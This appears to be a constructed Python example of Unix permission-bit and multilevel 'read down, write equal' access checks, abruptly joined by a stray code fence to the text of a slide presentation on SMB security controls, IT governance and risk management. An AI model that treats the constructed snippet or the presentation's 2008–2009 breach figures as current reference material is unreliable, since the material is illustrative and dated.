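from typing import Dict, List, Set, Tuple

BITS = {"r": 4, "w": 2, "x": 1}


def dac_permits(mode: int, file_uid: int, file_gid: int,
                uid: int, groups: Set[int], op: str) -> bool:
    """Pick the one triplet that applies (owner, then group, then other) and
    test its bit. mode is the permission part of st_mode, e.g. 0o640."""
    if uid == file_uid:
        shift = 6            # user bits
    elif file_gid in groups:
        shift = 3            # group bits
    else:
        shift = 0            # other bits
    return bool(((mode >> shift) & 0o7) & BITS[op])


LEVELS = {"public": 0, "internal": 1, "confidential": 2, "secret": 3}   # constructed


def mac_permits(subject_label: str, object_label: str, op: str) -> bool:
    """Read down: a subject may read objects at or below its own level.
    Write equal: it may write only objects at exactly its level, so it can
    neither leak information downward nor pollute higher-classified data."""
    s, o = LEVELS[subject_label], LEVELS[object_label]
    if op == "r":
        return s >= o
    if op == "w":
        return s == o
    raise ValueError(f"unknown operation {op!r}")


def access_matrix(subjects: List[str], objects: List[str],
                  op: str) -> Dict[Tuple[str, str], bool]:
    """Who may do `op` to what under MAC; useful when documenting user privileges."""
    return {(s, o): mac_permits(s, o, op) for s in subjects for o in objects}


if __name__ == "__main__":
    # constructed file: -rw-r----- owned by uid 1000, group 100
    print(dac_permits(0o640, 1000, 100, 1001, {100}, "r"))   # group member may read
    print(dac_permits(0o640, 1000, 100, 1001, {100}, "w"))   # but may not write
    print(access_matrix(["internal", "confidential"], ["public", "secret"], "r"))
```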

User Provisioning

Often resource intensive
Prone to error
Provisioning software generally not cost-effective for the SMB space
Maximize the applications that are AD-aware and can hopefully leverage groups for access control

Symmetric Encryption

Asymmetric Encryption

Disk Encryption

Should be deployed on all remote devices
Full-disk is preferable
Mitigates the significant threats of a device being lost/stolen

Email Encryption

Email goes over unencrypted ports
Some tools require the end user to encrypt outbound mail
Some can have policies based on destination
Can be symmetric or asymmetric

SIM/SIEM

Great way to reduce the cost of security
Consolidate those logs - make them useful!
Pivoting is very functional (BI for security)
− TriGeo
− ArcSight
− NetIQ

Database Auditing

Some built in
− Be careful of turning auditing on without tuning
Imperva has a database play
Don't let developers directly connect to the SQL port(s)

Data Loss Prevention (DLP)

Great way to gain visibility into previously unidentified risk vectors
− Remember due diligence & due care
Some can import databases
Some are agent-based
− This is good for mobile computing!

Physical Countermeasures

Information Security != Technical Security
Many attacks/breaches are due to physical security weaknesses

ID Cards

Various types
− RFID cards
− Smart cards
− Mag stripes

RFID Pros/Cons

Pros
− Easy
− Cost efficient
− Lots of vendors
Cons
− Cloning

Smart Cards Pros/Cons

Pros
− Intelligent
− Built-in CPU
Cons
− More expensive
− Complexity generally adds risk

Mag Stripes

Pros
− Cheaper cards
− Cheaper readers
Cons
− Exploitation costs lower

Administrative Controls

Policies, Procedures, and Standards mitigate end-user risk

Do not fall for the panacea that technology comprehensively mitigates risk

Policies

Describe management expectations
Describe what is to be done
Should be aligned with high-level control objectives/intentions

Procedures

Describe the actions required to carry out policies

Describe how to execute the policies

Standards

Describe high-level objectives for IT
− Consolidate types of technology in the environment
− Ensure implementation of security principles
A guidebook for architects
A summary of what the stakeholders described

Dual Control

Two pieces of a key to open a door
Two people to execute a transaction
Additional signatures for processing

Audit

Policies, procedures, and standards are not beneficial if not in use

Logs are required by auditors to ensure controls are consistently being implemented

Primary concepts
− Least privilege
− Segregation of duty
− Dual control
− Continual
− Repeatable

Least Privilege

Users should be given access only to resources necessary to carry out their job

Mitigates inappropriate disclosures
Enhances auditability
Should be used to help stakeholders define access control requirements for an asset

OS Hardening

Least privilege
− Only required services allowed
− Remove unnecessary services
Patching
− Mitigate vulnerabilities affecting the environment
Consistency
− Reduce complexity
− Limit the types of vulnerabilities affecting the environment
− Minimize vulnerabilities present in the environment
− Stabilize a baseline

Racking & Stacking @ a 3rd Party

How far up will they manage?
− Up to the rack? OS & app threats; ability to install countermeasures
− Up to the OS? Can you deploy OS/network countermeasures? Patching strategies; what about non-Microsoft applications?
− Up to the app? Auditability; least privilege

Virtualization Threats & Risks

Virtual host to virtual host connections
− Network-based countermeasures
Hypervisor security
− Mainframe
− Process sockets

Ignorance is Risk

Manage by Measurement Through the Use of a Control Framework

Security Risks & Exposures are Growing

More than 35 million data records were breached in 2008 in the United States - Theft Resource Center

Jan 20, 2009 - Heartland Payment Systems - 100 million transactions per month! http://www.2008breach.com/

252,276,206 records with personal information since January 1995 - www.privacyrights.org

Risk is a Business Issue

“Ignoring or misunderstanding financial risks played a substantial role in creating the world financial crisis in 2008.”

“Organizations need to assess risk as part of cost-cutting decisions and should manage increased IT risks to prevent operation failures that will lead to further loss.”

- Gartner, “Managing IT Risks During Cost-Cutting Periods”, October 22, 2008

Risk is a Business Issue (Cont.)

− CardSystems Solutions Inc.: mid-2005 breach of 40 million credit cards. Visa & Mastercard terminated their processing capability - they soon went under
− 35+ million data records were breached in 2008 in the United States - Theft Resource Center
− Heartland Payment Systems: Jan 20, 2009; 100 million transactions per month; http://www.2008breach.com
− 252,276,206 records with personal information since January 1995 - http://www.privacyrights.org

Risk Aware vs. Risk Averse

Risk Averse
− Avoids discussions of risk
− Avoids responsibility for risks
− No tracking or analysis of failures & successes
− Can't learn from mistakes; high repeat failure rates
− Padded budgets, extended timelines, surprise overruns
− Managers assign blame, don't share the risk

Risk Aware
− OK to talk about risk
− OK to take risks
− OK to fail (if managed appropriately)
− Successes and failures tracked and analyzed
− Continuous learning and improvement for key processes
− Realistic budgets and timelines that are continuously monitored
− Enterprise is able to take on bigger risks

2007 MIT Sloan Center for Information Systems Research & Gartner Inc.

Being Risk Aware Enables Agility & Innovation

Down economy causing executives to focus on profitability

3 ways to improve profitability
− Increase top-line sales
− Reduce COGS
− Optimize operations

Optimize IT
− Bridge the gap between control requirements, technical issues, and business risk
− Use a portfolio approach to risk management
− Manage by measurement
− Enable your organization to reap maximum benefit from technology investments

Regulation With Minimal Benefit

Redundant Requirements

Controls without clear benefits

Overlapping and vague requirements

Costly resource allocation

Regulations

Increasing complexity
Resource intensive
Divert focus from maturing risk management

Regulatory Convergence

Optimize Remediation

Assert Compliance Simultaneously

IT & Business Alignment- Are we communicating?

Agile - Competitive advantage
Prudent

Implications

IT is meant to serve the business

IT must be aligned with business goals

IT is costly and requires prudent management

Become Proactive

Instill best-practice governance
Utilize a risk-management portfolio to guide remediation
Consolidate regulations

Managing by Measurement

Leading the Trauma Unit

Governance- “Specifying the decision rights and accountability framework to encourage desirable behavior in using IT.”

- Peter Weill and Jeanne Ross, IT Governance: How Top Performers Manage IT Decisions Rights for Superior Results (Boston: Harvard Business School Press, 2004)

The Root-Cause of IT Risk -

Lack of Governance

50 case studies
130 firms surveyed
2000+ executives refined

George Westerman & Richard Hunter, IT Risk: Turning Business Threats Into Competitive Advantage (Harvard Business School Press, 2007)

“...manifested as uncontrolled complexity, and inattention to risk.”

5 Facets of Governance

Value delivery
Strategic alignment
Performance measurement
Resource management
Risk management

Improve Risk Management

Risk Management Process

− Identify critical assets
− Define containers
− Identify risks & threats
− Quantify or qualify risks

Prioritize Remediation Efforts

Stop The Bleeding - Cauterize the Wounds

Identify & collect known risks
Create a remediation portfolio
Document the “As-Is” state

Stabilize the Patient

Classify known risks

External Audits

Internal Audits

Regulatory Audits

Vulnerability Assessments

Risk Assessments

Address availability
Focus on business consequence

Consolidate Regulations

Identify Primary Controls
− Confidentiality
− Integrity
− Availability
− Auditability
− Performance measurement

Have a clear architectural direction / “To-Be” state

Conduct an IT Assessment to identify “As-Is” State

Through planning identify core strategies and architecture

Manage by Measurement

Seek Optimal Treatment Plan

Benefits of utilizing best practices

− Enables external expertise

− Facilitates benchmarking

− Auditor familiarity resulting in reduced costs

Best Practice Control Objectives

Components of Controls

Defines a specific goal
Aligns with business objectives
Describes the focus required to manage
Summarizes how the goal will be achieved
Defines potential KPIs/KGIs
RACI table

Communicate & Collaborate

Paradigms- 7 Habits of Highly Effective People- “A man on a subway sees 2 obnoxious children...”

The sum is greater than the individual pieces

Balanced Scorecards

Focus on 4 key paradigms
− Financial - fiscal measurements
− Customer - service qualities
− Operations - operational efficiency & agility
− Learning & Growth - fostering growth & innovation

Provides measurements based on key “customers” being serviced

Balanced Scorecards

Strategy Maps

Describe the “To-Be” state graphically
Facilitate collaboration
Minimize jargon

Collaborate

Strategy Map

Leading & Lagging Indicators

Leading indicators
− Sales targets
− # of site visitors expected this year

Lagging indicators
− $ closed deals last month
− Visitors last year
− Amount a specific product has generated thus far

KPIs & KGIs

A Key Goal Indicator, representing the process goal, is a measure of "what" has to be accomplished. It is a measurable indicator of the process achieving its goals, often defined as a target to achieve.

− Remain Profitable

− Take over 15% market share in a territory

By comparison, a Key Performance Indicator is a measure of "how well" the process is performing.

− % of Bench time for engineers - “Riding the Pine”

− # of opportunities in the pipeline

Prudent Management is not just for the enterprise anymore

Governance has been slowly adopted in the SMB space

− Perceived as an “enterprise play”
− ROI/CBA/NPV communication muddled with jargon

Talk to your audience - don't belabor acronyms and frameworks.

Focus on sound stewardship principles.

References

Privacy Violations - www.privacyrights.org
COBIT - www.isaca.org/cobit
VAL IT - www.isaca.org/valit
Strategy Maps - http://www.valuebasedmanagement.net/methods_strategy_maps_strategic_communication.html
BSC - http://www.balancedscorecard.org/
Lean Six Sigma - www.qimacros.com
Harvard Business Review

Jeromie Jackson - CISSP, CISM
[email protected]
619-368-7353 (direct)
www.linkedin.com/in/securityassessment

Questions?